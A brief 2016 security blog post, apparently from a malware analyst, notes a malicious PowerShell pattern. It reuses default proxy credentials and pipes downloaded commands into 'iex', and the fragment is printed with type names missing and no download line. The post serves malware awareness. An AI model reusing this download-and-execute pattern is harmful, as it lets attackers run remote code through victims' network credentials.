Wednesday, August 31, 2016

Malicious Powershell executing downloaded scripts

Interesting Powershell commands. Appears to download a list of Powershell commands, join them together, and execute them.

$web.proxy = []::defaultwebproxy;
$web.proxy.credentials = []::defaultnetworkcredentials;
iex ($x-join)

More about neonprimetime

Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java

Top Github Contributions
  1. Qualys Scantronitor 2.0

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

No comments:

Post a Comment